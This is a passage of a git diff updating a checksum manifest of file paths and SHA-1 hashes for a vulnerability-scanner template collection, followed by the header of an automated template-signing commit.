http/exposed-panels/wago-plc-panel.yaml:7789856ede292945f09de65d1861f1786813331f http/exposed-panels/wagtail-cms-detect.yaml:a53050b19d383733a9bafbd202c7e229e5a266fb http/exposed-panels/wallix-accessmanager-panel.yaml:a104603de3dc44c28b6a7678af7f373999ba41f4 @@ -4049,7 +4049,7 @@ http/exposed-panels/weiphp-panel.yaml:cfa2af2ae84576aec3e186c3437c12675faa27ce http/exposed-panels/whm-login-detect.yaml:39fb47f1276d8fad13ac68b42078faba73be82bb http/exposed-panels/wiren-board-webui.yaml:7a08ecc4c4855a9010bd9decf6428a3dc9d10fc6 http/exposed-panels/wmw-enterprise-panel.yaml:3395dc6cb97cc7ee242aac5def48860dc62c4ed8 -http/exposed-panels/woodwing-panel.yaml:83742242ff000c015a650222fe01c0325294a895 +http/exposed-panels/woodwing-panel.yaml:250eae1a04a73d53d430882613ab578bce470031 http/exposed-panels/wordpress-login.yaml:9ac874822fc5c863632f73dfa89aad79111d3858 http/exposed-panels/workresources-rdp.yaml:de21fc9ea3a09f2851f2bf3106017dcdd900daad http/exposed-panels/workspace-one-uem.yaml:c153ef43dd0c014fc7b04ba1726834a7d09b8723 @@ -4114,7 +4114,7 @@ http/exposures/backups/froxlor-database-backup.yaml:a8296d723d545dea6b9d898766db http/exposures/backups/php-backup-files.yaml:704953727958a0d9548426b00a0cb2d8558e31a5 http/exposures/backups/settings-php-files.yaml:466d0c870b539961c1cafb1b2e758aec08711df8 http/exposures/backups/sql-dump.yaml:370dbe1277256449870f9eb992b6a90ca636e887 -http/exposures/backups/zip-backup-files.yaml:487c3ae6d577218c258810b2c0ed55fc361cd3fd +http/exposures/backups/zip-backup-files.yaml:c9cfa74efe47b6302fb1ec22ac10ab2d8f5ddd6d http/exposures/configs/accueil-wampserver.yaml:d33e2f3e0f198426999fff6bcd7d1344b5c46240 http/exposures/configs/airflow-configuration-exposure.yaml:b212acd4a5ef9cbb3e0b84da2b4a3cd8599aa1b3 http/exposures/configs/alibaba-canal-info-leak.yaml:9a0d928feb9c023e106d2e5fb6d4d6bab4e84297 @@ -4263,7 +4263,7 @@ http/exposures/configs/wpconfig-aws-keys.yaml:960a11b79d35bc5a3b164fc7e426fb02b5 http/exposures/configs/xprober-service.yaml:3480056d644ec37a3b9ce5e81f55b9b279d66880 http/exposures/configs/yii-debugger.yaml:d7c68b7d7e09cdd6933e07f4b0274cde60eb3671 http/exposures/configs/zend-config-file.yaml:52e91071cd3c7deef4d59c107bb81cb7c0024793 -http/exposures/docker-daemon-exposed.yaml:7058b14b309a1b24bf20748bc1d7672987f061de +http/exposures/docker-daemon-exposed.yaml:127016c60c14f2928dd3344155680f7962a03e5b http/exposures/files/angular-json.yaml:33a8441b1e158d34f7f877820ba705662f9ba017 http/exposures/files/apache-licenserc.yaml:e7bf77390ddc3ece376cee856d2f8beb4820ef9b http/exposures/files/apdisk-disclosure.yaml:d911bc900df9ebb34b5068a66376c86aee4a1b90 @@ -4712,7 +4712,7 @@ http/misconfiguration/apache/apache-couchdb-unauth.yaml:fffefca1d97b39eadbe8b144 http/misconfiguration/apache/apache-filename-enum.yaml:00fec57e8abf4422bb9223a4f1ce706b023f0eef http/misconfiguration/apache/apache-hbase-unauth.yaml:8bcb271822c183ceed3502baabaf75b134cf6ec6 http/misconfiguration/apache/apache-nifi-unauth.yaml:4e19b0b31aea4665b8ca4fa4c2aa6380182ce120 -http/misconfiguration/apache/apache-server-status.yaml:ce218abeea339f9edeb4e33c94c8a5f9dd72d1f0 +http/misconfiguration/apache/apache-server-status.yaml:d6bd45d0a6457447bf93c3194c5a5134a2e62b90 http/misconfiguration/apache/apache-storm-unauth.yaml:5440aca3ee73dff76524b3abc210908fae1b9a92 http/misconfiguration/apache/apache-zeppelin-unauth.yaml:18859a2711b1796228e38d53e2588c4a211e33d4 http/misconfiguration/apache/kafka-manager-unauth.yaml:5b38f573c202a93132b56456bac0b43e5c66ece9 @@ -4733,7 +4733,7 @@ http/misconfiguration/aws/aws-redirect.yaml:3eae321734d805abec1fdc57bb8d11050410 http/misconfiguration/aws/aws-s3-explorer.yaml:8ecb526ca030871303b3e3f0349edaf292f30f55 http/misconfiguration/aws/aws-xray-application.yaml:e7ec644ccf2a75882aeace1f7192b1bf5ba62db1 http/misconfiguration/aws/awstats-listing.yaml:ded98212b09190410c3fa3186d1fb106d0f1c07d -http/misconfiguration/aws/cdn-cache-poisoning.yaml:5b27f7113ff166eddd9ec2eeab84cd6253569149 +http/misconfiguration/aws/cdn-cache-poisoning.yaml:66339bf6ba967c0d188eb930347ab4cb6cfe9cbc http/misconfiguration/bitbucket-auth-bypass.yaml:df9b1e0476b0f347aad3dfbfd8a5c1fde1cabc2b http/misconfiguration/bitbucket-public-repository.yaml:001bb9a9dc270f9c4b78b142db3b405082171211 http/misconfiguration/blackbox-exporter-metrics.yaml:e1ea25cf9e00b6ea4778e8e91e0e1642a828ab88 @@ -4806,7 +4806,7 @@ http/misconfiguration/git-web-interface.yaml:3fa518808352a34efd2b9d59050a10dbb59 http/misconfiguration/gitea-public-signup.yaml:fae5548916f8d705e5f45d912464abb0f88d798b http/misconfiguration/gitlab/gitlab-api-user-enum.yaml:f71fbd3e371f09da4b1df0af5d8e0446567ceb01 http/misconfiguration/gitlab/gitlab-public-repos.yaml:1a2b426983d0ca449461a9ece38aa439151b54f5 -http/misconfiguration/gitlab/gitlab-public-signup.yaml:69b0ac65ada3a93fc323f92e4577ea5c8e1d1d5b +http/misconfiguration/gitlab/gitlab-public-signup.yaml:8555e335e6aa2da0ef5afe35ba516d99cc936f80 http/misconfiguration/gitlab/gitlab-public-snippets.yaml:64aa47f34d185b8bbbc04b242eb0a76886d641ec http/misconfiguration/gitlab/gitlab-uninitialized-password.yaml:d9959b940359896de41142fe765303a3627c7ae5 http/misconfiguration/gitlab/gitlab-user-enum.yaml:d48b162b9c3d52c5e90373e80776e282f355c667 @@ -4825,8 +4825,8 @@ http/misconfiguration/graphql/graphql-field-suggestion.yaml:e3980e92406e7b5a055f http/misconfiguration/graphql/graphql-get-method.yaml:351010e26b4c9e8537768bacab9488197d306486 http/misconfiguration/graphql/graphql-playground.yaml:24366b060558b81457a709e43493c49268d517b6 http/misconfiguration/grav-register-admin.yaml:6a3fddf818baa56aeaec9c770585927ea224a6f3 -http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:c5a7f0bb3dfd8902a0ec68092edad303bd76c3c1 -http/misconfiguration/h2o/h2o-dashboard.yaml:001e032a7ad643e36b72eb05f916cb19819d4314 +http/misconfiguration/h2o/h2o-arbitary-file-read.yaml:bbde800e6dbf7a8306b09f3ae02e987ae0974c05 +http/misconfiguration/h2o/h2o-dashboard.yaml:8bf58ba09a86f242552dbc1da7d899bab7e954f7 http/misconfiguration/hadoop-unauth-rce.yaml:c10cd550c98774bea2cc2bffaea35fdeed862768 http/misconfiguration/haproxy-exporter-metrics.yaml:7014cae35a37a9962317e0a3d43f11d7906cb5c9 http/misconfiguration/haproxy-status.yaml:cd67a127bba5cbe7592fcddf3f9e4abe9ffccb4f @@ -4867,7 +4867,7 @@ http/misconfiguration/installer/dolphin-installer.yaml:66ccbdc0d810c8fb5876d46e8 http/misconfiguration/installer/easyscripts-installer.yaml:4cb8db53f08ed1bf8172866766c33878f579fda9 http/misconfiguration/installer/eshop-installer.yaml:c83244265e0cd9499cee6ecfd6fda805b6475251 http/misconfiguration/installer/espeasy-installer.yaml:051a8d1869f34a42c6d6a287ff2668c3b07c2b99 -http/misconfiguration/installer/espocrm-installer.yaml:242742d8b79699b3fb379c7eeeedcbb3a6ca2774 +http/misconfiguration/installer/espocrm-installer.yaml:72c1946c34836333680deaf83886371585119081 http/misconfiguration/installer/facturascripts-installer.yaml:cba5490847e989a892fef13fdcd1ae9f2c01dbea http/misconfiguration/installer/geniusocean-installer.yaml:d18cbff0dd385dbab1c44876c8ac2587116fef1a http/misconfiguration/installer/getsimple-installation.yaml:5673a1203b9080ff329c3fe251cb799e41d0432e @@ -4990,8 +4990,8 @@ http/misconfiguration/mingyu-xmlrpc-sock-adduser.yaml:d680c0d1f329ae9d5f114cf4ac http/misconfiguration/misconfigured-concrete5.yaml:a90cb787ff30a2a15ce8d9c359b109def5344d07 http/misconfiguration/misconfigured-docker.yaml:f69b164e183b7c668ba054389e77c6aa3cc25fb6 http/misconfiguration/missing-sri.yaml:1bc66d65f6b661a47fc8925571630064bbcd8e40 -http/misconfiguration/mixed-active-content.yaml:9184c5011f55391f85223e1b62b4254a1da06f68 -http/misconfiguration/mixed-passive-content.yaml:f6a45ef89eb4b21814634ecd1e996b27bb03667c +http/misconfiguration/mixed-active-content.yaml:be92e4a41bfe8adfa000a7609123ab0804393c5b +http/misconfiguration/mixed-passive-content.yaml:560de299022eede8eea76330d45da7bab34e0513 http/misconfiguration/mlflow-unauth.yaml:b4493ff237b1e91ad2445c6d48b5908294501c08 http/misconfiguration/mobiproxy-dashboard.yaml:4d76a953ef877f0847e2722091d679b905023cc8 http/misconfiguration/mobsf-framework-exposure.yaml:ce18ea150b09e873eb04db50bc6cfd862400f558 @@ -5024,7 +5024,7 @@ http/misconfiguration/pa11y-dashboard.yaml:320c6e5df6e86518cc8d9be989a6c15c115ac http/misconfiguration/pcdn-cache-node.yaml:ce6284d32f7c53da7cb29df9621c33304a7551eb http/misconfiguration/perfsonar-toolkit.yaml:fb876f3a1ee791e97ffc96f2560176840fdba143 http/misconfiguration/pghero-dashboard-exposure.yaml:10a596525bcca76216f10ea9c037361e97da3c65 -http/misconfiguration/php/php-composer-binary.yaml:c24bdeff5a801e3901a00f645b4888d9835435fb +http/misconfiguration/php/php-composer-binary.yaml:c4155c87a395d54e304ae8bb5739213844de656f http/misconfiguration/php-debugbar-exposure.yaml:a5e1d970a64a77388dce82db58111e68582842c6 http/misconfiguration/php-errors.yaml:71015100ca7b81f0d9e592cfd976622c8b532bc3 http/misconfiguration/php-fpm-status.yaml:033a35edfc98e280891a432cfe711cb5023757b8 @@ -5184,8 +5184,8 @@ http/misconfiguration/wamp-xdebug-detect.yaml:2a608ec7de4dca7fc2d79a16bc985c6c82 http/misconfiguration/webalizer-statistics.yaml:2e235491d13ae14335b40204dcda9bab0dcef6ea http/misconfiguration/webdav-enabled.yaml:020a537d8248d2f315548eb4c77a96fe53a2709b http/misconfiguration/wildcard-postmessage.yaml:f093c46c8343a8ba6c035d57c6677df34e1f642d -http/misconfiguration/woodwing-git.yaml:edaa8ba5d62a4657dbd5557aeddcdd097f40996f -http/misconfiguration/woodwing-phpinfo.yaml:6002db4816377ce3fa1e793301ee276ea51fb0b9 +http/misconfiguration/woodwing-git.yaml:517ce9b0f04376eacbcfd3248e644fb02b637144 +http/misconfiguration/woodwing-phpinfo.yaml:e466f98b269abbb53d5b73a0d33b621487bc7fd6 http/misconfiguration/wp-registration-enabled.yaml:80e7c4e7b905638621680dce0f918e04c640901a http/misconfiguration/xss-deprecated-header.yaml:f753e621b0423e9137b8b700d47e53edfe08922b http/misconfiguration/zabbix-dashboards-access.yaml:3c22ac8316130a4672bffc19baf7b129b2765ef8 @@ -5615,7 +5615,7 @@ http/osint/pikabu.yaml:232402913d7ecfe855b1e19bce0fb2a711b3458e http/osint/pillowfort.yaml:1f95523e1bf01e9d92d3022d16b18d24e93d0ee6 http/osint/pinkbike.yaml:7dcfb70c1c5c3ea7f825e51213a02ee3b689c2fa http/osint/pinterest.yaml:9eaf491d742b2442c6de61543117a05c8989c39c -http/osint/piratebay.yaml:1386ed8faa74f79714338e9b1980fd7a7e29d17b +http/osint/piratebay.yaml:d0b7661de36c1c66f5bcabcbbe1a863ac1d04091 http/osint/pixelfedsocial.yaml:2aa2c1d6fee4992154cc6e5168f0a3ffb9c70b4d http/osint/platzi.yaml:24fdedd4333116082a5fd15bc291fc6c988f1cb0 http/osint/playstation-network.yaml:8c63335825366ef99b3f5105c2df127e2ff7f071 @@ -5954,7 +5954,7 @@ http/technologies/aws/aws-detect.yaml:812353461f7775f1af527595050ae2d3ef21831b http/technologies/aws-elastic-beanstalk-detect.yaml:4b6c0949dc67cc5fdb67ae1c335ff282107064d1 http/technologies/azure-kubernetes-service.yaml:851ecff2f7b78b255a43445c47d0a0be4f264c9a http/technologies/b2b-builder-detect.yaml:df521df25cbae2a6a13e06d4ec88c7beeb13f7a7 -http/technologies/bamboo-detect.yaml:29457940e76951888d640d7a8608db2b51c348d7 +http/technologies/bamboo-detect.yaml:43d85ffe26d76b1e849bf4247e1d437be9c902d3 http/technologies/basic-auth-detect.yaml:54cc07706423c9e421c2e1d2df062f61bf92c075 http/technologies/besu-server-detect.yaml:409434cf55cd4a3212a3e0c11630ecd1fd81382e http/technologies/bigbluebutton-detect.yaml:d0fecbfe3234220cfc43fd3f3ac058474e719a04 @@ -6081,7 +6081,7 @@ http/technologies/impresscms-detect.yaml:aed6cbf7a0e39d65461ad18a94870d5498a81ee http/technologies/influxdb-version-detect.yaml:f841eecc70b68b122327d0af759d612c344c18c9 http/technologies/interactsh-server.yaml:7b66780d07fddd75e7a107ff31dd20d43a2f1bfe http/technologies/intercom.yaml:b70407a8734fa02aff97aee00bac7abdd50e2eaf -http/technologies/iparapheur-detect.yaml:82b1007d48f3bbb4e4f12dc00bb77468eb2048d1 +http/technologies/iparapheur-detect.yaml:5a654d1c45a684856c809c899c77602e58df7437 http/technologies/iplanet-web-server.yaml:5d16c78e08583a966e6d9d3c9beee7d7c84ce633 http/technologies/ispyconnect-detect.yaml:824d28bf59ef67a8eaedaa3743ae1be8292d12d3 http/technologies/jboss-detect.yaml:21aa64a158ad1c97c1436ad116d277408838a917 @@ -6658,7 +6658,7 @@ http/token-spray/api-nytimes.yaml:515f52e0dbaa76c67e47a0e0f63a607b966520d7 http/token-spray/api-onelogin.yaml:c1970dce04c68ff40687f9aa5189fbdf2f07bdd2 http/token-spray/api-onyphe.yaml:c931393e726323591b3f170ddda5e4dd548e4c8a http/token-spray/api-open-page-rank.yaml:291f62ec42ea118f68223e44043d39e1c6d616a2 -http/token-spray/api-openai.yaml:98b146f8013df819687095a1bc26f045513d373e +http/token-spray/api-openai.yaml:5959906dcd81ae1ee1957e8f54e03bcf9ac0e712 http/token-spray/api-opengraphr.yaml:5c15cfdbb054e77687564346951337cc0904f151 http/token-spray/api-openweather.yaml:489a77cb31f3b4510b748c12ec2104d6a43a6ec7 http/token-spray/api-opsgenie.yaml:bb7a91bd82ee7c96607e1963dbbf8b41af56832a @@ -6756,7 +6756,7 @@ http/token-spray/google-timezone.yaml:810190cf9c433c43ce6f551f29e6767f15f7412f http/token-spray/googlet-extsearchplaces.yaml:b136a266a5998ad603817d34d8bb0ce9599a9401 http/vulnerabilities/74cms/74cms-weixin-sqli.yaml:2d87bdfcd0dd6b777635096b6ff8ec5d1ca69559 http/vulnerabilities/amazon/amazon-ec2-ssrf.yaml:496cc34d7d9b138c78b6a8779d8da8cb498b89a1 -http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:0961cb03beae07c74f89579ef9c32eabc5da8457 +http/vulnerabilities/apache/apache-druid-kafka-connect-rce.yaml:9ce3ed3fc125ac16fa51e42033e50ad99e3b3077 http/vulnerabilities/apache/apache-flink-unauth-rce.yaml:0a7ce14a72d4914f195dc3b2ed413f44bdc22ec5 http/vulnerabilities/apache/apache-ofbiz-log4j-rce.yaml:3ac1eedd905e673571e5512c235d16968777bce3 http/vulnerabilities/apache/apache-solr-file-read.yaml:0a4ed215fe43e7fb4f0be607787a637a80773bb0 @@ -6801,9 +6801,9 @@ http/vulnerabilities/dedecms/dedecms-openredirect.yaml:ef865d280c1f205c779cd924a http/vulnerabilities/dedecms/dedecms-rce.yaml:09aec1d67e8618040f7be679c32f5ca3cd4cbcb0 http/vulnerabilities/deos-open500-admin.yaml:dc17c53569c4d3bec2ba64a02e872665f2c51e7e http/vulnerabilities/discuz/discuz-api-pathinfo.yaml:4cd287eda013330adf57a16f49f49611e1a1ea59 -http/vulnerabilities/dlink/dlink-netgear-xss.yaml:ea57f7ffe86bd9dca59a27575b6e9981417aed26 +http/vulnerabilities/dlink/dlink-netgear-xss.yaml:da4ead0baf0f1f04d4418e51c8d7df92b24b4c5c http/vulnerabilities/drupal/drupal-avatar-xss.yaml:1058d534d63fdae5e60b8a97cb170499e4c4ac1e -http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:0edc18f27d389cb0b956f9e6437974501eb8957d +http/vulnerabilities/ecstatic/node-ecstatic-internal-path.yaml:00b9f1533b58905efbdc16ca577fc6193ce9aacf http/vulnerabilities/ecstatic/node-ecstatic-listing.yaml:65c7ff96a02c77e0b15da0d5aa676dd4e9908faa http/vulnerabilities/fastjson/fastjson-1-2-24-rce.yaml:d1e90625be0514d41048bed71a21e367556b4d4f http/vulnerabilities/fastjson/fastjson-1-2-41-rce.yaml:2ef0518658108401b361842897fd0a98f6e6d94d @@ -6858,7 +6858,7 @@ http/vulnerabilities/jenkins/jenkins-asyncpeople.yaml:28dbb6ff09c477f85b9bb63b57 http/vulnerabilities/jenkins/jenkins-script.yaml:d557e9f184eed10b1f1c9d2769ce17b9873bf47f http/vulnerabilities/jenkins/jenkins-stack-trace.yaml:7ebe9434bb86753e39e131e4e69d1f79b279179a http/vulnerabilities/jenkins/unauthenticated-jenkins.yaml:ec2c0e3a02f421de35854cdaac9bc6fa7b608785 -http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:41c24ec00e76a64389092d142412030ab45f7951 +http/vulnerabilities/jinhe/jinhe-jc6-sqli.yaml:bfc59e0ede14264cc8bd6c9c35692e74f1056f1a http/vulnerabilities/jinhe/jinhe-oa-c6-lfi.yaml:ddb4e69fa2143bf694f57a117f26e02f9a0b3db5 http/vulnerabilities/jira/jira-servicedesk-signup.yaml:d3ad2f1c3e763757dfc43f44463017a99f5afed4 http/vulnerabilities/jira/jira-unauthenticated-adminprojects.yaml:b82ea1a2c8c93438f53c1d8176716d28c54d6249 @@ -7176,7 +7176,7 @@ http/vulnerabilities/other/sound4-impact-password-auth-bypass.yaml:c0e5c69a2fe4b http/vulnerabilities/other/spark-webui-unauth.yaml:19ee616f773e813374fc47d917657c16c8abafa0 http/vulnerabilities/other/splunk-enterprise-log4j-rce.yaml:a93f685eb795c5e4b5f9e3ae6674a49554666d73 http/vulnerabilities/other/sponip-network-system-ping-rce.yaml:81d5e41b6b741ee4db2819a49071cac7ba5060fa -http/vulnerabilities/other/sslvpn-client-rce.yaml:ac492f114c925ea8c0b52379639e2ad659c77cf9 +http/vulnerabilities/other/sslvpn-client-rce.yaml:dbe9348f2320aa3285a36301db4781559503f9f3 http/vulnerabilities/other/stackposts-sqli.yaml:dd70b29c551d65e468a483e9dcb2f9c7dfc78f85 http/vulnerabilities/other/steve-xss.yaml:a889a95c473c3d9a4dd6415a99eaa49a582379c0 http/vulnerabilities/other/surrealtodo-lfi.yaml:946ddddaa6ac882b1a2fe3cf6b84a029d8904435 @@ -7247,9 +7247,9 @@ http/vulnerabilities/ruijie/ruijie-eg-rce.yaml:30d9d3087f11408821e363103be528190 http/vulnerabilities/ruijie/ruijie-excu-shell.yaml:4e44d86d3461ede6a3e205a00a96c455937c7640 http/vulnerabilities/ruijie/ruijie-nbr-fileupload.yaml:d21221f94ba84906b86aebb2ef888e8df203035f http/vulnerabilities/ruijie/ruijie-networks-lfi.yaml:c3789288ed1f6805695c9ccc837a1b056f017975 -http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:85cd22dc109529bd4a93f0d18672d93221befc04 +http/vulnerabilities/ruijie/ruijie-nmc-sync-rce.yaml:f2f77c7a5ce510a2057b8955127dc3d0afbd0134 http/vulnerabilities/ruijie/ruijie-password-leak.yaml:b40b0764c02ffb6af9faef8f9153a8995c0f0522 -http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:0a2396d38254dd85dd159290288867e5f2da0b41 +http/vulnerabilities/ruijie/ruijie-rg-eg-web-mis-rce.yaml:2adf6194c403f1d9c8c598884a7aeab8e43a1cd0 http/vulnerabilities/ruijie-eg-login-rce.yaml:95135a8fbb28e97e78f39b9c640f6dca3a49c283 http/vulnerabilities/samsung/samsung-wlan-ap-lfi.yaml:48d0b9ac33013573db9fa5ecc17282a88729fda9 http/vulnerabilities/samsung/samsung-wlan-ap-rce.yaml:a4258c6a3d83986629e3a30e17e98de93180ffdc @@ -7310,7 +7310,7 @@ http/vulnerabilities/topsec/topsec-topapplb-auth-bypass.yaml:9061b5a5e6523f698d8 http/vulnerabilities/ueditor/ueditor-ssrf.yaml:6d255515d772049bbc3acf2eda7a486357d23ee7 http/vulnerabilities/ueditor/ueditor-xss.yaml:222e1f2da270e70eb6a8c9a9b57ba955b9ecb785 http/vulnerabilities/vbulletin/arcade-php-sqli.yaml:3aefc2073f08e855dec0c8146b728b692ce654f2 -http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:e2c419c8a941b5b8eb3f7feeccee4bb8a540e066 +http/vulnerabilities/vbulletin/vbulletin-ajaxreg-sqli.yaml:11dded630df610de2c7a8e5860c12335c9d7f3a8 http/vulnerabilities/videoxpert-lfi.yaml:1aa4c4a1048489e9343348c0e436a2917c4edcf9 http/vulnerabilities/vmware/vmware-cloud-xss.yaml:df692b63d1958fa36556a7a8a2adf3fe47866cdc http/vulnerabilities/vmware/vmware-hcx-log4j.yaml:73321afec891e37709b54301889f4d0fddf26e1e @@ -7572,9 +7572,9 @@ http/vulnerabilities/zyxel/unauth-ztp-ping.yaml:fe9fe6bf3d7f27b2f5297126714f53c3 http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac80eca48e3eb64691 http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:539291160ef312c1e5f1124b7f525ec6a9743696 http/vulnerabilities/zzzcms/zzzcms-xss.yaml:964a23c1b692ca2c29f6b9824b1608b2999f0922 -javascript/cves/2016/CVE-2016-8706.yaml:3626d8980d2247ad0b1d039a9ac366e4b05295b4 -javascript/cves/2023/CVE-2023-34039.yaml:f0ae32be8b7f82e3413b4105bbdef3e65a403bdb -javascript/cves/2023/CVE-2023-46604.yaml:6aaecca334d7c343a04ca87b72da3adfd54518e8 +javascript/cves/2016/CVE-2016-8706.yaml:afda6278e60fd5314163daacc9bf807a24a0007b +javascript/cves/2023/CVE-2023-34039.yaml:2a80775ac1b4e519aabea888a521392f6aff6ac5 +javascript/cves/2023/CVE-2023-46604.yaml:338fdcbf6fe0e10ec31c3eee28717fe3db97686d javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161 javascript/default-logins/postgres-default-logins.yaml:dfa3031c3333b73c7c50bc8f37c85dcd093d7fe7 javascript/default-logins/redis-default-logins.yaml:2fa73c5a1e16bf94079c15ae7c9299fa3adbfb2b @@ -7593,27 +7593,27 @@ javascript/enumeration/ssh/ssh-weak-algo-supported.yaml:462745d4ff89ccb1516907c8 javascript/enumeration/ssh/ssh-weak-mac-algo.yaml:97ddb2a2a98a70b008ae719d269282712ac56db1 javascript/enumeration/ssh/ssh-weak-public-key.yaml:7076a31490cf0af4bf0974079683af697b0a3191 javascript/enumeration/ssh/ssh-weakkey-exchange-algo.yaml:d81373c1b8062220c434a0398801f2b78ba074d1 -javascript/network/smb/smb-anonymous-access.yaml:71f8d01bf0636fcd3cf9f8a715e0813b3a38b34f -javascript/network/smb/smb-shares.yaml:513194cdfd11049ef553965b8052311316a5d740 -javascript/network/smb/smb-signing-not-required.yaml:2c7e20ed225ab6ddc406238e56e9c43615a55ee7 -javascript/network/smb/smb2-capabilities.yaml:4d425f470620d21954aebce47944db682400ff75 +javascript/network/smb/smb-anonymous-access.yaml:767a1e1f81dd42483240e9539d5adeb1c9d38a44 +javascript/network/smb/smb-shares.yaml:d1aa323e4d98da8a30aaf9d5b534bf8f723a8738 +javascript/network/smb/smb-signing-not-required.yaml:b4f942182e4092a0f4b3021f6335087fecc59f77 +javascript/network/smb/smb2-capabilities.yaml:45e2e47336ad715f6d2c81af1454340331ffebc3 network/backdoor/backdoored-zte.yaml:42b5ec609229045d3ebbb6e8968a1797413afb44 network/cves/2001/CVE-2001-1473.yaml:792d2fb301e5a5fa6c1274a7ec98cc825e4ad31a network/cves/2011/CVE-2011-2523.yaml:5faa7da6447727cf75dc5bd02575579dfb9ba6cb network/cves/2015/CVE-2015-3306.yaml:e4aed504f414b657f5292cfb75db068e391530cd -network/cves/2016/CVE-2016-2004.yaml:ea578b492acb943ce0b8dac1c9c752b035c6f13b -network/cves/2016/CVE-2016-3510.yaml:d8d69d16f6afc388bfa0f6d065911f1bbb83c1b9 -network/cves/2017/CVE-2017-3881.yaml:f0c81eb6ce7a4475d90ae6f99710278b8ab23bf4 -network/cves/2017/CVE-2017-5645.yaml:caddb604c2472173206909c27dd13625b1859305 -network/cves/2018/CVE-2018-2628.yaml:a04f80971409772076638dde77e9da75b6ef31b8 -network/cves/2018/CVE-2018-2893.yaml:6a71a1b60c13e8d12f7f4f558b9b0e568168a313 -network/cves/2020/CVE-2020-11981.yaml:0aef729b93969f3ba807abd098eba54447ee9550 -network/cves/2020/CVE-2020-1938.yaml:f46203c54a3afc9737db739e0458c71a8f7daf76 -network/cves/2020/CVE-2020-7247.yaml:de87cd533820250fe1e8c40fc6499fd1b9d01e00 -network/cves/2021/CVE-2021-44521.yaml:f7a71484160a4c642c7de89532faa90f8197bd9a +network/cves/2016/CVE-2016-2004.yaml:7629f706576b009ea97cda8851ca2b5135d34675 +network/cves/2016/CVE-2016-3510.yaml:8358c6dedcb21adf69a2fb0c8e829735a4ebce11 +network/cves/2017/CVE-2017-3881.yaml:ccb97630b6c54a1644800b15fc20e1e242dd1e42 +network/cves/2017/CVE-2017-5645.yaml:ecf24a67d8c212dc05d5db2f3ed78b216a024f7d +network/cves/2018/CVE-2018-2628.yaml:e251ff805fb2391da1c59a84ae268799418920db +network/cves/2018/CVE-2018-2893.yaml:f7d9ea0de02d2804e06f31e430194f55c6a5d69b +network/cves/2020/CVE-2020-11981.yaml:9313e97b8289d8a77a24edde88ce5b269eee63ce +network/cves/2020/CVE-2020-1938.yaml:9198617b136fe507dc73b7d06e017fc4ed328724 +network/cves/2020/CVE-2020-7247.yaml:662c67543e3b269c41f107d16e33288039106e2f +network/cves/2021/CVE-2021-44521.yaml:9c70214bfe69e066d139c88db519c6c0a21ac7f1 network/cves/2022/CVE-2022-0543.yaml:e9859038895a62b5bb1e60ed5c400d9b0e0940c1 -network/cves/2022/CVE-2022-24706.yaml:558b9f30d43c93982b35a0a01bb1e3eb8d17fe47 -network/cves/2022/CVE-2022-31793.yaml:44734dfe444240fe29eee0b67e46da54a488de03 +network/cves/2022/CVE-2022-24706.yaml:2d16c2670570efa0ffdad61cb1abd12cfa16031d +network/cves/2022/CVE-2022-31793.yaml:00ed525b7528b8b6e7e5a88d450ce5db07c85662 network/cves/2023/CVE-2023-33246.yaml:dd5addc8188363be41ecfdc2e11d67d15a599f65 network/default-login/ftp-anonymous-login.yaml:da3402a791529b5521e14fceafe0f0084bb4c9d2 network/default-login/ftp-weak-credentials.yaml:1405ce162895ba2dcdaa7277e687a28a2ff40ce7 @@ -7718,7 +7718,7 @@ network/misconfig/clamav-unauth.yaml:e256d077da3729eeee6c1cd4cc7ae91b23f8ebe3 network/misconfig/clickhouse-unauth.yaml:f5b90bc8e168b55bfe3543a69a59cfc508adb619 network/misconfig/dropbear-weakalgo.yaml:6c7daef01b97062533ba41e8c242ef9fc8a546bd network/misconfig/dropbear-weakmac.yaml:afc50bf81ebe0d85bb0f2a2be9be8ae8df3fc7de -network/misconfig/erlang-daemon.yaml:dba240f5ddcfedc6c3495dec3c50a55628536499 +network/misconfig/erlang-daemon.yaml:e52bb4b59ced2e1a785baff526c2b3f7a7e22476 network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109 network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a @@ -7756,7 +7756,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:f6a60c9b6234a281d22af2436c44dac52ccac831 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:eac3197b9e6ec0342dff2ef774c6785c852868b4 -templates-checksum.txt:d0d9f919b33a14bbfa9bc98298e3ec13374db702 +templates-checksum.txt:c0e7395cd4b32e2b81d1eefad99fe91400589b33 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 32cd37a9f43695bc4afc10d9aa71db46a477f2ac Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 14 Jan 2024 14:05:19 +0000 Subject: [PATCH 045/285] Auto Template Signing [Sun Jan 14 14:05:19 UTC 2024] :robot: --- cloud/enum/azure-vm-cloud-enum.yaml | 2 +- cloud/enum/azure-website-enum.yaml | 2 +- cloud/enum/gcp-app-engine-enum.yaml | 2 +- cloud/enum/gcp-bucket-enum.yaml | 2 +- cloud/enum/gcp-firebase-app-enum.yaml | 2 +- cloud/enum/gcp-firebase-rtdb-enum.yaml | 2 +- code/cves/2023/CVE-2023-49105.yaml | 2 +- headless/cves/2018/CVE-2018-25031.yaml | 2 +- http/cves/2000/CVE-2000-0114.yaml | 2 +- http/cves/2001/CVE-2001-0537.yaml | 2 +- http/cves/2002/CVE-2002-1131.yaml | 2 +- 